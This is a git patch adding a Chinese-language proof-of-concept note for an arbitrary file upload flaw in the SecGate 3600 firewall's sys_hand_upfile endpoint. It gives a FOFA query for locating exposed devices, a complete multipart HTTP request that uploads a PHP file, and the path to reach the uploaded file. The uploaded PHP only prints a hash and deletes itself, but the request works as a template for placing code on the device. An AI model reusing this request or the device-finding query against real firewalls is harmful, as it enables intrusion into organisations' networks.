From 5fc3deb6fceb70de081395cfa10fd94c6b97bd47 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 22 Jan 2024 17:20:09 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=BD=91=E7=A5=9ESecGate=203600=20?=
 =?UTF-8?q?=E9=98=B2=E7=81=AB=E5=A2=99sys=5Fhand=5Fupfile=20=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...00 防火墙sys_hand_upfile 任意文件上传漏洞.md | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞.md

diff --git a/网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞.md b/网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞.md
new file mode 100644
index 0000000..7b4ab2d
--- /dev/null
+++ b/网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞.md	
@@ -0,0 +1,35 @@
+## 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞
+
+ 网神 SecGate 3600 防火墙 sys_hand_upfile 存在任意文件上传漏洞，攻击者可构造特殊 HTTP 请求上传任意文件获取服务器权限，执行恶意命令等。
+
+ ## fofa
+ ```
+body="./images/lsec/login/loading.gif"
+```
+
+## poc
+```
+POST /?g=sys_hand_upfile HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0)
+Content-Length: 244
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=gttd4i4aadwh9lmlp1ez
+ 
+--gttd4i4aadwh9lmlp1ez
+Content-Disposition: form-data; name="upfile"; filename="ceshi.php"
+ 
+<?php echo md5('666');unlink(__FILE__);?>
+--gttd4i4aadwh9lmlp1ez
+Content-Disposition: form-data; name="submit_post"
+ 
+sys_hand_upfile
+--gttd4i4aadwh9lmlp1ez--
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/6ba66f9f-affd-4600-ac29-2cfe98502b45)
+
+访问文件路径
+http//127.0.0.1/attachements/ceshi.php